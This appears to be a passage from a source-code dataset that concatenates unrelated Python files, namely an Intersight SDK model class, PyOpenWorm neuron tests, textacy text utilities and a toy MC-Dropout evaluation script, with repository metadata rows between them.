aggregate_port_id (int): Breakout port Identifier of the Switch Interface. When a port is not configured as a breakout port, the aggregatePortId is set to 0, and unused. When a port is configured as a breakout port, the 'aggregatePortId' port number as labeled on the equipment, e.g. the id of the port on the switch.. [optional] # noqa: E501
port_id (int): Port Identifier of the Switch/FEX/Chassis Interface. When a port is not configured as a breakout port, the portId is the port number as labeled on the equipment, e.g. the id of the port on the switch, FEX or chassis. When a port is configured as a breakout port, the 'portId' represents the port id on the fanout side of the breakout cable.. [optional] # noqa: E501
slot_id (int): Slot Identifier of the Switch/FEX/Chassis Interface.. [optional] # noqa: E501
port_policy (FabricPortPolicyRelationship): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
'_check_type': _check_type,
'_path_to_item': _path_to_item,
'_spec_property_naming': _spec_property_naming,
'_configuration': _configuration,
'_visited_composed_classes': self._visited_composed_classes,
}
required_args = {
'class_id': class_id,
'object_type': object_type,
}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(
constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if var_name in unused_args and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
not self._additional_properties_model_instances:
# discard variable.
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
lazy_import()
return {
'anyOf': [
],
'allOf': [
FabricPortRole,
FabricTransceiverRoleAllOf,
],
'oneOf': [
],
}
| 54.184438 | 1,678 | 0.636794 |
import re
import sys
from intersight.model_utils import (
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from intersight.model.display_names import DisplayNames
from intersight.model.fabric_appliance_role import FabricApplianceRole
from intersight.model.fabric_fcoe_uplink_role import FabricFcoeUplinkRole
from intersight.model.fabric_port_policy_relationship import FabricPortPolicyRelationship
from intersight.model.fabric_port_role import FabricPortRole
from intersight.model.fabric_transceiver_role_all_of import FabricTransceiverRoleAllOf
from intersight.model.fabric_uplink_role import FabricUplinkRole
from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
from intersight.model.mo_tag import MoTag
from intersight.model.mo_version_context import MoVersionContext
globals()['DisplayNames'] = DisplayNames
globals()['FabricApplianceRole'] = FabricApplianceRole
globals()['FabricFcoeUplinkRole'] = FabricFcoeUplinkRole
globals()['FabricPortPolicyRelationship'] = FabricPortPolicyRelationship
globals()['FabricPortRole'] = FabricPortRole
globals()['FabricTransceiverRoleAllOf'] = FabricTransceiverRoleAllOf
globals()['FabricUplinkRole'] = FabricUplinkRole
globals()['MoBaseMoRelationship'] = MoBaseMoRelationship
globals()['MoTag'] = MoTag
globals()['MoVersionContext'] = MoVersionContext
class FabricTransceiverRole(ModelComposed):
allowed_values = {
('class_id',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('object_type',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('admin_speed',): {
'AUTO': "Auto",
'1GBPS': "1Gbps",
'10GBPS': "10Gbps",
'25GBPS': "25Gbps",
'40GBPS': "40Gbps",
'100GBPS': "100Gbps",
},
('fec',): {
'AUTO': "Auto",
'CL91': "Cl91",
'CL74': "Cl74",
},
}
validations = {
('aggregate_port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 0,
},
('port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 1,
},
('slot_id',): {
'inclusive_maximum': 5,
'inclusive_minimum': 1,
},
}
@cached_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,)
_nullable = False
@cached_property
def openapi_types():
lazy_import()
return {
'class_id': (str,),
'object_type': (str,),
'admin_speed': (str,),
'fec': (str,),
'account_moid': (str,),
'create_time': (datetime,),
'domain_group_moid': (str,),
'mod_time': (datetime,),
'moid': (str,),
'owners': ([str], none_type,),
'shared_scope': (str,),
'tags': ([MoTag], none_type,),
'version_context': (MoVersionContext,),
'ancestors': ([MoBaseMoRelationship], none_type,),
'parent': (MoBaseMoRelationship,),
'permission_resources': ([MoBaseMoRelationship], none_type,),
'display_names': (DisplayNames,),
'aggregate_port_id': (int,),
'port_id': (int,),
'slot_id': (int,),
'port_policy': (FabricPortPolicyRelationship,),
}
@cached_property
def discriminator():
lazy_import()
val = {
'fabric.ApplianceRole': FabricApplianceRole,
'fabric.FcoeUplinkRole': FabricFcoeUplinkRole,
'fabric.UplinkRole': FabricUplinkRole,
}
if not val:
return None
return {'class_id': val}
attribute_map = {
'class_id': 'ClassId',
'object_type': 'ObjectType',
'admin_speed': 'AdminSpeed',
'fec': 'Fec',
'account_moid': 'AccountMoid',
'create_time': 'CreateTime',
'domain_group_moid': 'DomainGroupMoid',
'mod_time': 'ModTime',
'moid': 'Moid',
'owners': 'Owners',
'shared_scope': 'SharedScope',
'tags': 'Tags',
'version_context': 'VersionContext',
'ancestors': 'Ancestors',
'parent': 'Parent',
'permission_resources': 'PermissionResources',
'display_names': 'DisplayNames',
'aggregate_port_id': 'AggregatePortId',
'port_id': 'PortId',
'slot_id': 'SlotId',
'port_policy': 'PortPolicy',
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
@convert_js_args_to_python_args
def __init__(self, class_id, object_type, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
'_check_type': _check_type,
'_path_to_item': _path_to_item,
'_spec_property_naming': _spec_property_naming,
'_configuration': _configuration,
'_visited_composed_classes': self._visited_composed_classes,
}
required_args = {
'class_id': class_id,
'object_type': object_type,
}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(
constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if var_name in unused_args and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
not self._additional_properties_model_instances:
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# loading
lazy_import()
return {
'anyOf': [
],
'allOf': [
FabricPortRole,
FabricTransceiverRoleAllOf,
],
'oneOf': [
],
}
| true | true |
f7191914c7488e7767557e9c0a804a86c906515e | 4,350 | py | Python | tests/NeuronTest.py | jaideep-seth/PyOpenWorm | c36baeda9590334ba810296934973da34f0eab78 | [
"MIT"
] | 1 | 2019-03-22T12:02:36.000Z | 2019-03-22T12:02:36.000Z | tests/NeuronTest.py | BioComSoftware/PyOpenWorm | 32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f | [
"MIT"
] | null | null | null | tests/NeuronTest.py | BioComSoftware/PyOpenWorm | 32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f | [
"MIT"
] | null | null | null | from __future__ import print_function
from __future__ import absolute_import
from .DataTestTemplate import _DataTest
from PyOpenWorm.neuron import Neuron
from PyOpenWorm.cell import Cell
from PyOpenWorm.connection import Connection
from PyOpenWorm.context import Context
class NeuronTest(_DataTest):
ctx_classes = (Neuron, Connection)
def setUp(self):
_DataTest.setUp(self)
self.neur = lambda x: self.ctx.Neuron(name=x)
def test_Cell(self):
do = self.neur('BDUL')
self.assertTrue(isinstance(do, Cell))
def test_receptors(self):
n = self.neur('AVAL')
n.receptor('GLR-2')
self.save()
self.assertIn('GLR-2', list(self.neur('AVAL').receptors()))
def test_same_name_same_id(self):
"""
Test that two Neuron objects with the same name have the same
identifier. Saves us from having too many inserts of the same object.
"""
c = Neuron(name="boots")
c1 = Neuron(name="boots")
self.assertEqual(c.identifier, c1.identifier)
def test_type(self):
n = self.neur('AVAL')
n.type('interneuron')
self.save()
self.assertEqual('interneuron', self.neur('AVAL').type.one())
def test_name(self):
"""
Test that the name property is set when the neuron is initialized
with it
"""
self.assertEqual('AVAL', self.neur('AVAL').name())
self.assertEqual('AVAR', self.neur('AVAR').name())
def test_neighbor(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
neighbors = list(n.neighbor())
self.assertIn(self.neur('PVCL'), neighbors)
self.save()
self.assertIn(self.neur('PVCL'), list(self.neur('AVAL').neighbor()))
def test_neighbor_count(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.save()
p = self.ctx.Neuron()
self.neur('AVAL').neighbor(p)
self.assertEqual(1, p.count())
def test_neighbor_count_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.assertEqual(1, n.neighbor.count())
def test_neighbor_count_context_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
ctx1 = Context(ident='http://example.org/ctx1')
self.assertEqual(0, ctx1(n).neighbor.count())
def test_connection_count(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.save()
self.assertEqual(1, self.neur('AVAL').connection.count())
def test_connection_count_staged(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.assertEqual(1, n.connection.count())
def test_neighbor_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.neighbor(n1)
self.assertEqual(set(), set(ctx1(n0).neighbor()))
def test_connection_get_staged(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(1, len(n0.connection()))
def test_connection_only_defined(self):
n0 = self.ctx.Neuron(name='NEURON0')
n0.connection(self.ctx.Connection())
self.assertEqual(0, len(n0.connection()))
def test_connection_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(set(), set(ctx1(n0).connection()))
def test_init_from_lineage_name(self):
c = self.ctx.Neuron(lineageName="AB plapaaaap", name="ADAL")
self.save()
for x in self.TestConfig['rdf.graph'].quads((None, None, None, None)):
print(' '.join(y.n3() for y in x))
c = self.context.stored(Neuron)(lineageName="AB plapaaaap")
print(c.context)
self.assertEqual(c.name(), 'ADAL')
| 35.365854 | 85 | 0.624828 | from __future__ import print_function
from __future__ import absolute_import
from .DataTestTemplate import _DataTest
from PyOpenWorm.neuron import Neuron
from PyOpenWorm.cell import Cell
from PyOpenWorm.connection import Connection
from PyOpenWorm.context import Context
class NeuronTest(_DataTest):
ctx_classes = (Neuron, Connection)
def setUp(self):
_DataTest.setUp(self)
self.neur = lambda x: self.ctx.Neuron(name=x)
def test_Cell(self):
do = self.neur('BDUL')
self.assertTrue(isinstance(do, Cell))
def test_receptors(self):
n = self.neur('AVAL')
n.receptor('GLR-2')
self.save()
self.assertIn('GLR-2', list(self.neur('AVAL').receptors()))
def test_same_name_same_id(self):
c = Neuron(name="boots")
c1 = Neuron(name="boots")
self.assertEqual(c.identifier, c1.identifier)
def test_type(self):
n = self.neur('AVAL')
n.type('interneuron')
self.save()
self.assertEqual('interneuron', self.neur('AVAL').type.one())
def test_name(self):
self.assertEqual('AVAL', self.neur('AVAL').name())
self.assertEqual('AVAR', self.neur('AVAR').name())
def test_neighbor(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
neighbors = list(n.neighbor())
self.assertIn(self.neur('PVCL'), neighbors)
self.save()
self.assertIn(self.neur('PVCL'), list(self.neur('AVAL').neighbor()))
def test_neighbor_count(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.save()
p = self.ctx.Neuron()
self.neur('AVAL').neighbor(p)
self.assertEqual(1, p.count())
def test_neighbor_count_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.assertEqual(1, n.neighbor.count())
def test_neighbor_count_context_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
ctx1 = Context(ident='http://example.org/ctx1')
self.assertEqual(0, ctx1(n).neighbor.count())
def test_connection_count(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.save()
self.assertEqual(1, self.neur('AVAL').connection.count())
def test_connection_count_staged(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.assertEqual(1, n.connection.count())
def test_neighbor_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.neighbor(n1)
self.assertEqual(set(), set(ctx1(n0).neighbor()))
def test_connection_get_staged(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(1, len(n0.connection()))
def test_connection_only_defined(self):
n0 = self.ctx.Neuron(name='NEURON0')
n0.connection(self.ctx.Connection())
self.assertEqual(0, len(n0.connection()))
def test_connection_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(set(), set(ctx1(n0).connection()))
def test_init_from_lineage_name(self):
c = self.ctx.Neuron(lineageName="AB plapaaaap", name="ADAL")
self.save()
for x in self.TestConfig['rdf.graph'].quads((None, None, None, None)):
print(' '.join(y.n3() for y in x))
c = self.context.stored(Neuron)(lineageName="AB plapaaaap")
print(c.context)
self.assertEqual(c.name(), 'ADAL')
| true | true |
f719199aa68ef685b796249b0f94249df6e5c02f | 105 | py | Python | tests/parser/query.10.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/query.10.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/query.10.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
a.
x | d :- a.
c :- b.
c?
"""
output = """
a.
x | d :- a.
c :- b.
c?
"""
| 5.526316 | 12 | 0.238095 | input = """
a.
x | d :- a.
c :- b.
c?
"""
output = """
a.
x | d :- a.
c :- b.
c?
"""
| true | true |
f7191a9344d5198ccde86f8f184716fe9107a381 | 5,646 | py | Python | textacy/text_utils.py | tbsexton/textacy | 964614213c7261f91f09c106334269388d45f790 | [
"Apache-2.0"
] | null | null | null | textacy/text_utils.py | tbsexton/textacy | 964614213c7261f91f09c106334269388d45f790 | [
"Apache-2.0"
] | null | null | null | textacy/text_utils.py | tbsexton/textacy | 964614213c7261f91f09c106334269388d45f790 | [
"Apache-2.0"
] | null | null | null | """
Text Utils
----------
Set of small utility functions that take text strings as input.
"""
import logging
import re
from typing import Iterable, Optional, Set, Tuple
from . import constants
LOGGER = logging.getLogger(__name__)
def is_acronym(token: str, exclude: Optional[Set[str]] = None) -> bool:
"""
Pass single token as a string, return True/False if is/is not valid acronym.
Args:
token: Single word to check for acronym-ness
exclude: If technically valid but not actually good acronyms are known in advance,
pass them in as a set of strings; matching tokens will return False.
Returns:
Whether or not ``token`` is an acronym.
"""
# exclude certain valid acronyms from consideration
if exclude and token in exclude:
return False
# don't allow empty strings
if not token:
return False
# don't allow spaces
if " " in token:
return False
# 2-character acronyms can't have lower-case letters
if len(token) == 2 and not token.isupper():
return False
# acronyms can't be all digits
if token.isdigit():
return False
# acronyms must have at least one upper-case letter or start/end with a digit
if not any(char.isupper() for char in token) and not (
token[0].isdigit() or token[-1].isdigit()
):
return False
# acronyms must have between 2 and 10 alphanumeric characters
if not 2 <= sum(1 for char in token if char.isalnum()) <= 10:
return False
# only certain combinations of letters, digits, and '&/.-' allowed
if not constants.RE_ACRONYM.match(token):
return False
return True
def keyword_in_context(
text: str,
keyword: str,
*,
ignore_case: bool = True,
window_width: int = 50,
print_only: bool = True,
) -> Optional[Iterable[Tuple[str, str, str]]]:
"""
Search for ``keyword`` in ``text`` via regular expression, return or print strings
spanning ``window_width`` characters before and after each occurrence of keyword.
Args:
text: Text in which to search for ``keyword``.
keyword: Technically, any valid regular expression string should work,
but usually this is a single word or short phrase: "spam", "spam and eggs";
to account for variations, use regex: "[Ss]pam (and|&) [Ee]ggs?"
.. note:: If keyword contains special characters, be sure to escape them!
ignore_case: If True, ignore letter case in ``keyword`` matching.
window_width: Number of characters on either side of ``keyword``
to include as "context".
print_only: If True, print out all results with nice formatting;
if False, return all (pre, kw, post) matches as generator of raw strings.
Yields:
Next 3-tuple of prior context, the match itself, and posterior context.
"""
flags = re.IGNORECASE if ignore_case is True else 0
if print_only is True:
for match in re.finditer(keyword, text, flags=flags):
line = "{pre} {kw} {post}".format(
pre=text[max(0, match.start() - window_width) : match.start()].rjust(
window_width
),
kw=match.group(),
post=text[match.end() : match.end() + window_width].ljust(window_width),
)
print(line)
else:
for match in re.finditer(keyword, text, flags=flags):
yield (
text[max(0, match.start() - window_width) : match.start()],
match.group(),
text[match.end() : match.end() + window_width],
)
KWIC = keyword_in_context
"""Alias of :func:`keyword_in_context <textacy.text_utils.keyword_in_context>`."""
def clean_terms(terms: Iterable[str]) -> Iterable[str]:
"""
Clean up a sequence of single- or multi-word strings: strip leading/trailing
junk chars, handle dangling parens and odd hyphenation, etc.
Args:
terms: Sequence of terms such as "presidency", "epic failure",
or "George W. Bush" that may be _unclean_ for whatever reason.
Yields:
Next term in `terms` but with the cruft cleaned up, excluding terms
that were _entirely_ cruft
Warning:
Terms with (intentionally) unusual punctuation may get "cleaned"
into a form that changes or obscures the original meaning of the term.
"""
# get rid of leading/trailing junk characters
terms = (constants.RE_LEAD_TAIL_CRUFT_TERM.sub("", term) for term in terms)
terms = (constants.RE_LEAD_HYPHEN_TERM.sub(r"\1", term) for term in terms)
# handle dangling/backwards parens, don't allow '(' or ')' to appear without the other
terms = (
""
if term.count(")") != term.count("(") or term.find(")") < term.find("(")
else term
if "(" not in term
else constants.RE_DANGLING_PARENS_TERM.sub(r"\1\2\3", term)
for term in terms
)
# handle oddly separated hyphenated words
terms = (
term
if "-" not in term
else constants.RE_NEG_DIGIT_TERM.sub(
r"\1\2", constants.RE_WEIRD_HYPHEN_SPACE_TERM.sub(r"\1", term)
)
for term in terms
)
# handle oddly separated apostrophe'd words
terms = (
constants.RE_WEIRD_APOSTR_SPACE_TERM.sub(r"\1\2", term) if "'" in term else term
for term in terms
)
# normalize whitespace
terms = (constants.RE_NONBREAKING_SPACE.sub(" ", term).strip() for term in terms)
for term in terms:
if re.search(r"\w", term):
yield term
| 35.734177 | 90 | 0.626993 | import logging
import re
from typing import Iterable, Optional, Set, Tuple
from . import constants
LOGGER = logging.getLogger(__name__)
def is_acronym(token: str, exclude: Optional[Set[str]] = None) -> bool:
if exclude and token in exclude:
return False
if not token:
return False
# don't allow spaces
if " " in token:
return False
if len(token) == 2 and not token.isupper():
return False
# acronyms can't be all digits
if token.isdigit():
return False
if not any(char.isupper() for char in token) and not (
token[0].isdigit() or token[-1].isdigit()
):
return False
if not 2 <= sum(1 for char in token if char.isalnum()) <= 10:
return False
if not constants.RE_ACRONYM.match(token):
return False
return True
def keyword_in_context(
text: str,
keyword: str,
*,
ignore_case: bool = True,
window_width: int = 50,
print_only: bool = True,
) -> Optional[Iterable[Tuple[str, str, str]]]:
flags = re.IGNORECASE if ignore_case is True else 0
if print_only is True:
for match in re.finditer(keyword, text, flags=flags):
line = "{pre} {kw} {post}".format(
pre=text[max(0, match.start() - window_width) : match.start()].rjust(
window_width
),
kw=match.group(),
post=text[match.end() : match.end() + window_width].ljust(window_width),
)
print(line)
else:
for match in re.finditer(keyword, text, flags=flags):
yield (
text[max(0, match.start() - window_width) : match.start()],
match.group(),
text[match.end() : match.end() + window_width],
)
KWIC = keyword_in_context
def clean_terms(terms: Iterable[str]) -> Iterable[str]:
terms = (constants.RE_LEAD_TAIL_CRUFT_TERM.sub("", term) for term in terms)
terms = (constants.RE_LEAD_HYPHEN_TERM.sub(r"\1", term) for term in terms)
terms = (
""
if term.count(")") != term.count("(") or term.find(")") < term.find("(")
else term
if "(" not in term
else constants.RE_DANGLING_PARENS_TERM.sub(r"\1\2\3", term)
for term in terms
)
# handle oddly separated hyphenated words
terms = (
term
if "-" not in term
else constants.RE_NEG_DIGIT_TERM.sub(
r"\1\2", constants.RE_WEIRD_HYPHEN_SPACE_TERM.sub(r"\1", term)
)
for term in terms
)
# handle oddly separated apostrophe'd words
terms = (
constants.RE_WEIRD_APOSTR_SPACE_TERM.sub(r"\1\2", term) if "'" in term else term
for term in terms
)
# normalize whitespace
terms = (constants.RE_NONBREAKING_SPACE.sub(" ", term).strip() for term in terms)
for term in terms:
if re.search(r"\w", term):
yield term
| true | true |
f7191add8f756794b4712383067b7b7dd7494a69 | 3,495 | py | Python | toyClassification/MC-Dropout-MAP-01-Adam/eval.py | frezaeix/evaluating_bdl | bd0a464981c18de8479b6be2d91867527016c8d3 | [
"MIT"
] | null | null | null | toyClassification/MC-Dropout-MAP-01-Adam/eval.py | frezaeix/evaluating_bdl | bd0a464981c18de8479b6be2d91867527016c8d3 | [
"MIT"
] | null | null | null | toyClassification/MC-Dropout-MAP-01-Adam/eval.py | frezaeix/evaluating_bdl | bd0a464981c18de8479b6be2d91867527016c8d3 | [
"MIT"
] | null | null | null | # code-checked
# server-checked
from model import ToyNet
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import pickle
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import cv2
batch_size = 32
M = 4
x_min = -6.0
x_max = 6.0
num_points = 60
network = ToyNet("Farzaneh_eval_MC-Dropout-MAP-01-Adam_1_M10_0", project_dir="../").cuda()
network.load_state_dict(torch.load("../training_logs/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_0/checkpoints/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_epoch_300.pth"))
M_float = float(M)
print (M_float)
network.eval()
false_prob_values = np.zeros((num_points, num_points))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
for x_1_i, x_1_value in enumerate(x_values):
for x_2_i, x_2_value in enumerate(x_values):
x = torch.from_numpy(np.array([x_1_value, x_2_value])).unsqueeze(0).cuda() # (shape: (1, 2))
mean_prob_vector = np.zeros((2, ))
for i in range(M):
logits = network(x) # (shape: (1, num_classes)) (num_classes==2)
prob_vector = F.softmax(logits, dim=1) # (shape: (1, num_classes))
prob_vector = prob_vector.data.cpu().numpy()[0] # (shape: (2, ))
mean_prob_vector += prob_vector/M_float
false_prob_values[x_2_i, x_1_i] = mean_prob_vector[0]
plt.figure(1)
x_1, x_2 = np.meshgrid(x_values, x_values)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density_gray.png" % network.model_dir)
plt.close(1)
x_values = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
dist = np.sqrt(x_1**2 + x_2**2)
false_prob_values_GT = np.zeros(dist.shape)
false_prob_values_GT[dist < 2.4] = 1.0
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_GT.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_gray_GT.png" % network.model_dir)
plt.close(1)
with open("../HMC/false_prob_values.pkl", "rb") as file: # (needed for python3)
false_prob_values_HMC = pickle.load(file) # (shape: (60, 60))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
x_values_GT = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1_GT, x_2_GT = np.meshgrid(x_values_GT, x_values_GT)
fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True, sharex=True, sharey=True, figsize=(11.0, 5.0))
im = axes.flat[0].pcolormesh(x_1, x_2, false_prob_values_HMC, cmap="RdBu", vmin=0, vmax=1)
im = axes.flat[1].pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu", vmin=0, vmax=1)
fig.colorbar(im, ax=axes.flat)
plt.savefig("%s/predictive_density_comparison.png" % network.model_dir)
plt.close()
| 32.971698 | 171 | 0.731903 |
from model import ToyNet
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import pickle
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import cv2
batch_size = 32
M = 4
x_min = -6.0
x_max = 6.0
num_points = 60
network = ToyNet("Farzaneh_eval_MC-Dropout-MAP-01-Adam_1_M10_0", project_dir="../").cuda()
network.load_state_dict(torch.load("../training_logs/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_0/checkpoints/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_epoch_300.pth"))
M_float = float(M)
print (M_float)
network.eval()
false_prob_values = np.zeros((num_points, num_points))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
for x_1_i, x_1_value in enumerate(x_values):
for x_2_i, x_2_value in enumerate(x_values):
x = torch.from_numpy(np.array([x_1_value, x_2_value])).unsqueeze(0).cuda()
mean_prob_vector = np.zeros((2, ))
for i in range(M):
logits = network(x)
prob_vector = F.softmax(logits, dim=1)
prob_vector = prob_vector.data.cpu().numpy()[0]
mean_prob_vector += prob_vector/M_float
false_prob_values[x_2_i, x_1_i] = mean_prob_vector[0]
plt.figure(1)
x_1, x_2 = np.meshgrid(x_values, x_values)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density_gray.png" % network.model_dir)
plt.close(1)
x_values = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
dist = np.sqrt(x_1**2 + x_2**2)
false_prob_values_GT = np.zeros(dist.shape)
false_prob_values_GT[dist < 2.4] = 1.0
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_GT.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
